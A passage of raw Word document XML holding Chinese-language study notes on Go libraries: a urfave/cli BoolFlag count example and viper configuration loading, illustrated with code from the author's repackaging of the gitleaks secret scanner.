      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AFB448C" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="548189E5" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    if err := app.Run(os.Args); err != nil {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08940AA2" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">        log.Fatal(err)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3268A6AB" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73CEC256" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E0263BD" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>&amp;cli.BoolFlag</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CB9254D" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>对于</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> bool </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>标志，您可以多次指定标志以获得计数（例如</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> -v -v -v </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>或</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> -vvv</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05D8B412" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6580D9BF" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>"github.com/urfave/cli/v2"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B2E71F8" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5FD6FB0D" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>func main() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="556A1842" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>var count int</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62318373" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="208CCD10" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    app := &amp;cli.App{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54A3A312" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>Flags: []cli.Flag{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24B3D596" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">            &amp;cli.BoolFlag{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2215B27C" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">                Name:        "foo",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="356D1477" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">                Usage:       "foo greeting",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34B6F5C5" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">               </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> Count: &amp;count,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69FF468E" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">            },</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01429413" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">        },</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72375240" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4F5B47AD" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7BD9A8E9" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6831F684" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5FCB1A2A" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0DB7B2E6" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5B56DBC6" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2E3A19F1" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0601F252" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="362" w:name="_Toc159779818"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">github.com/spf13/viper: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>读取配置文件</w:t>
      </w:r>
      <w:bookmarkEnd w:id="362"/>
    </w:p>
    <w:p w14:paraId="13B9D702" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>参考链接：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B7A2970" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:hyperlink r:id="rId112" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="a5"/>
            <w:rFonts w:hint="eastAsia"/>
          </w:rPr>
          <w:t>https://github.com/spf13/viper</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="789492FD" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:hyperlink r:id="rId113" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="a5"/>
            <w:rFonts w:hint="eastAsia"/>
          </w:rPr>
          <w:t>https://juejin.cn/post/6844904051369312264</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="76D7E3ED" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="534FEA37" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3BD92835" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="14E84622" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>优先级：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DD747C4" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>explicit call to Set</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36E8F3A2" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>flag</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21D767FE" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>env</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FBD4274" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>config</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AAB4B68" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>key/value store</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1878CADF" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>default</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D0B8AAD" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6ED3FB7E" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>直接设置环境：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5563F94C" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>viper.SetDefault("ContentDir", "content")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="775FC16E" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>viper.SetDefault("LayoutDir", "layouts")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F8C9D96" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>viper.SetDefault("Taxonomies", map[string]string{"tag": "tags", "category": "categories"})</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40864A73" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7AE2F823" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>读取配置文件</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7056592A" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3BA7833D" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>支持配置文件格式：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>JSON, TOML, YAML, HCL, INI, envfile and Java Properties files</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2462930E" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="74B03608" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>注意：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>viper</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的配置的键值是大小写不敏感的，对环境变量是大小写敏感的。一个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>viper</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>实例支持多个路径环境（但是至少得提供一个），但是只支持解析</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>个配置文件</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2715C8B8" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="09C1FF68" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>另外注意，在写</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>gitleaks</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>打包项目时注意到，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>viper</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在进行配置时可以配置路径、原生的配置文件、后缀名等等，但是读取的行为基本上时这两个函数：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="726FF3F9" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Eg:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BEF8454" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="cyan"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t xml:space="preserve">viper.ReadConfig: # </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>读取</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>raw</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>的配置文件本身</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EB46182" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>bindata_default_toml, _ := bindata.Asset("gitleaks-n-all-kill.toml")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="290D8DA6" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>viper.SetConfigType("toml")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07FFCF7B" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>if err := viper.ReadConfig(bytes.NewBuffer(bindata_default_toml)); err != nil {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BC761AB" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>log.Fatal().Msgf("unable to load gitleaks config, err: %s", err)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AFAE1F8" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75BBC2E1" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="cyan"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>viper.ReadInConfig()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t xml:space="preserve"> # </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>viper.ReadInConfig()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>读取某个配置文件</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F301F22" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>viper.SetConfigFile(cfgPath)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="34273CAF" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>fmt.Print("</w:t>
      </w:r>
      <w:r>
        <w:t>已加载</w:t>
      </w:r>
      <w:r>
        <w:t>config</w:t>
      </w:r>
      <w:r>
        <w:t>参数</w:t>
      </w:r>
      <w:r>
        <w:t>")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="604FDD8A" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">if err := </w:t>
      </w:r>
      <w:bookmarkStart w:id="363" w:name="OLE_LINK11"/>
      <w:r>
        <w:t>viper.ReadInConfig()</w:t>
      </w:r>
      <w:bookmarkEnd w:id="363"/>
      <w:r>
        <w:t>; err != nil {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72F2DA69" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>log.Fatal().Msgf("unable to load gitleaks config, err: %s", err)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69B1E1D5" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68319399" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
